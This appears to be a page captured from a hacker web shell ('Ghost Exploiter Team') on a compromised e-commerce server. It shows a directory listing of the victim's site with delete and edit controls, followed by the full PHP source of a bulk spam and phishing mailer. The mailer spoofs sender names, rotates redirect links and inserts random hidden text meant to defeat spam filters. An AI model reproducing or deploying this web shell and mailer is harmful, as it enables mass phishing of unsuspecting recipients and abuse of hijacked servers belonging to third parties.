Ghost Exploiter Team Official
/
home
/
ramdevpcb
/
public_html
/
Nama File / Folder
Size
Action
.DS_Store
--
NONE
.well-known
--
NONE
Apple
--
NONE
Config
--
NONE
accounts.ramdevpcb.com
--
NONE
admin.ramdevpcb.com
--
NONE
ap
--
NONE
api
--
NONE
app
--
NONE
assets
--
NONE
cgi-bin
--
NONE
delivery.ramdevpcb.com
--
NONE
razorpay-php-master
--
NONE
sales.ramdevpcb.com
--
NONE
spotify
--
NONE
.htaccess
0.274KB
Hapus
Edit
Rename
MAXVEL CATALOGUE 2023.pdf
55.84MB
Hapus
Edit
Rename
Privacy_Policy.php
17.97KB
Hapus
Edit
Rename
Product_Details.php
33.28KB
Hapus
Edit
Rename
Products.php
72.202KB
Hapus
Edit
Rename
Products2.php
22.467KB
Hapus
Edit
Rename
about.php
43.034KB
Hapus
Edit
Rename
ajax-common.php
6.367KB
Hapus
Edit
Rename
apply-coupon.php
1.237KB
Hapus
Edit
Rename
bg6.png
239.047KB
Hapus
Edit
Rename
checkout.php
19.243KB
Hapus
Edit
Rename
contact.php
8.294KB
Hapus
Edit
Rename
create_order.php
1.073KB
Hapus
Edit
Rename
db.php
0.666KB
Hapus
Edit
Rename
delete_address.php
0.347KB
Hapus
Edit
Rename
deleteproduct.php
0.362KB
Hapus
Edit
Rename
download_invoice.php
0.395KB
Hapus
Edit
Rename
email.html
2.977KB
Hapus
Edit
Rename
footer (2).php
22.071KB
Hapus
Edit
Rename
footer.php
9.45KB
Hapus
Edit
Rename
get_product.php
3.688KB
Hapus
Edit
Rename
getcity.php
0.496KB
Hapus
Edit
Rename
googlebdc637812fd99722.html
0.052KB
Hapus
Edit
Rename
googlebfc2f3b3c36359c4.html
0.052KB
Hapus
Edit
Rename
header1.php
51.568KB
Hapus
Edit
Rename
index (44).php
90.686KB
Hapus
Edit
Rename
index1.php
71.197KB
Hapus
Edit
Rename
indexnew.php
97.6KB
Hapus
Edit
Rename
interlaced.png
16.737KB
Hapus
Edit
Rename
licenses.php
0.081KB
Hapus
Edit
Rename
logout.php
0.232KB
Hapus
Edit
Rename
my.php
44.607KB
Hapus
Edit
Rename
myorderdetails.php
6.695KB
Hapus
Edit
Rename
myordernew.php
28.397KB
Hapus
Edit
Rename
page-login-register.php
28.91KB
Hapus
Edit
Rename
page-login-register_old.php
29.911KB
Hapus
Edit
Rename
php.ini
0.06KB
Hapus
Edit
Rename
placeorder.php
7.531KB
Hapus
Edit
Rename
product-right.php
82.268KB
Hapus
Edit
Rename
qnow.php
14.316KB
Hapus
Edit
Rename
r&c.php
5.128KB
Hapus
Edit
Rename
ramdev.zip
1353.63MB
Hapus
Edit
Rename
raw.php
0.209KB
Hapus
Edit
Rename
s&d.php
5.673KB
Hapus
Edit
Rename
send.php
5.59KB
Hapus
Edit
Rename
send_password.php
2.244KB
Hapus
Edit
Rename
shop-checkout1.php
59.101KB
Hapus
Edit
Rename
shop-wishlist.php
7.947KB
Hapus
Edit
Rename
shopcart.php
25.882KB
Hapus
Edit
Rename
shopcart1.php
16.813KB
Hapus
Edit
Rename
sms.php
0.735KB
Hapus
Edit
Rename
tracking.php
11.972KB
Hapus
Edit
Rename
updateprofile.php
1.267KB
Hapus
Edit
Rename
updateqty.php
0.912KB
Hapus
Edit
Rename
<=Back
<?php error_reporting(0); $testa = $_POST['veio']; if($testa != "") { $redirectlist = array_unique(explode("\n",$_POST['redirectlist'])); $message = $_POST['message']; $subject = $_POST['subject']; $realname = $_POST['realname']; $from = $_POST['from']; $to = $_POST['emaillist']; $headers = "MIME-Version: 1.0\r\n"; $headers .= "Content-type: text/html; charset=UTF-8\r\n"; $email = explode("\n", $to); $headers .= "From: ".$realname." <".$from.">\r\n"; $message = stripslashes($message); $i = 0; $count = 1; $redi = 0; $countred = count($redirectlist); while($email[$i]) { if($redi >= $countred) $redi = 0; $redirect = $redirectlist[$redi].'/'.md5(rand(0,99999)+rand(0,9999)); $ok = "ok"; $messgb = "\r\n<!-- \r\n Here we go some texte here to fuck security ".md5(rand(0,99999)+rand(0,99999))." \r\n what do you think about it".md5(rand(0,99999)+rand(0,99999))."\r\n -->"; $messgb .= str_replace('[red]', $redirect, $message); if(mail($email[$i], $subject, $messgb, $headers)) echo "* N?mero: $count <b>".$email[$i]."</b> <font color=green>OK</font><br><hr>"; else echo "* N?mero: $count <b>".$email[$i]."</b> <font color=red>ERRO AO ENVIAR</font><br><hr>"; $i++; $count++; $redi++; } $count--; if($ok == "ok") echo "FINALIZO SUPERGERADOR"; } ?> <html> <head> <title>-=FREEXMAN Mailer =-</title> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <style> body { margin-left: 0; margin-right: 0; margin-top: 0; margin-bottom: 0; } .titulo { font-family: Arial, Helvetica, sans-serif; font-size: 70px; color: #000; font-weight: bold; } .normal { font-family: Arial, Helvetica, sans-serif; font-size: 12px; color: #000000; } .form { font-family: Arial, Helvetica, sans-serif; font-size: 10px; color: #333333; background-color: #FFFFFF; border: 1px dashed #666666; } .texto { font-family: Verdana, Arial, Helvetica, sans-serif; font-weight: bold; color: #000; } .alerta { font-family: Verdana, Arial, Helvetica, sans-serif; font-weight: bold; color: #990000; font-size: 10px; } body,td,th { color: #000; } </style> </head> <body> <form action="" method="post" enctype="multipart/form-data" name="form1"> <input type="hidden" name="veio" value="sim"> <table width="527" height="511" border="0" cellpadding="0" cellspacing="1" bgcolor="#CCCCCC" class="normal"> <tr> <td width="525" height="25" align="center" bgcolor="#999999"><span class="titulo"> <span style="font-size: 40pt"># Gu3ssWho? #</span></span></td> </tr> <tr> <td height="194" valign="top" bgcolor="#FFFFFF"> <table width="100%" border="0" cellpadding="0" cellspacing="5" class="normal" height="444"> <tr> <td align="right" height="17"><span class="texto">De (E-Mail)/(Name) :</span></td> <td width="65%" height="17"> <input name="from" value="<?php print $from; ?>" type="text" class="form" id="de" style="width:49%" size="1" ><input name="realname" type="text" class="form" id="realname" style="width:48%" value="<?php print $realname; ?>" size="1" > </td> </tr> <tr> <td align="right" height="17" style="color: #000"> <span class="texto">Dir LI Bghiti :P :</span></td> <td width="65%" height="17" style="color: #000"> <input name="replyto" type="text" class="form" id="realname0" style="width:48%" value="<?php print $replyto; ?>" size="1" > <font size="-3" face="Verdana, Arial, Helvetica, sans-serif"> <input type="file" name="file" size="11" /></font></td> </tr> <tr> <td align="right" height="17"><span class="texto">subject:</span></td> <td height="17"> <input name="subject" type="text" class="form" id="subject" style="width:100%" value="<? print $subject; ?>" size="1" ></td> </tr> <tr align="center" bgcolor="#99CCFF"> <td height="20" colspan="2" bgcolor="#999999"><span class="texto">Código HTML:</span></td> </tr> <tr align="right"> <td height="146" colspan="2" valign="top"><br> <textarea name="message" style="width:100%" rows="8" wrap="VIRTUAL" class="form" id="html" cols="1"><?php print $message; ?></textarea> <span class="alerta">*Letter HTML</span></td> </tr> <tr align="center" bgcolor="#99CCFF"> <td height="47" colspan="2" bgcolor="#FFCC00"><span class="texto"> Collez Dakshi a Ca place Ghadi isendi Inbox :P</span><p> <span class="texto">Gu3ssWho? Mailer !! Version 1.0</span></td> </tr> <tr align="right"> <td height="136" colspan="2" valign="top"><br> <textarea name="emaillist" style="width:100%" rows="8" wrap="VIRTUAL" class="form" id="emaillist" cols="1"><?php print $emaillist; ?></textarea> <span class="alerta">*Email List !!</span> </td> </tr> <tr align="right"> <td height="136" colspan="2" valign="top"><br> <textarea name="redirectlist" style="width:100%" rows="8" wrap="VIRTUAL" class="form" id="redirectlist" cols="1"><?php print $emaillist; ?></textarea> <span class="alerta">*Redirection List !!</span> </td> </tr> <tr> <td height="26" align="right" valign="top" colspan="2"> <input type="submit" value="Send eMails"></td> </tr> </table> </td> </tr> <tr> <td height="15" align="center" bgcolor="#999999"> </td> </tr> </table> </form> </body>
Liking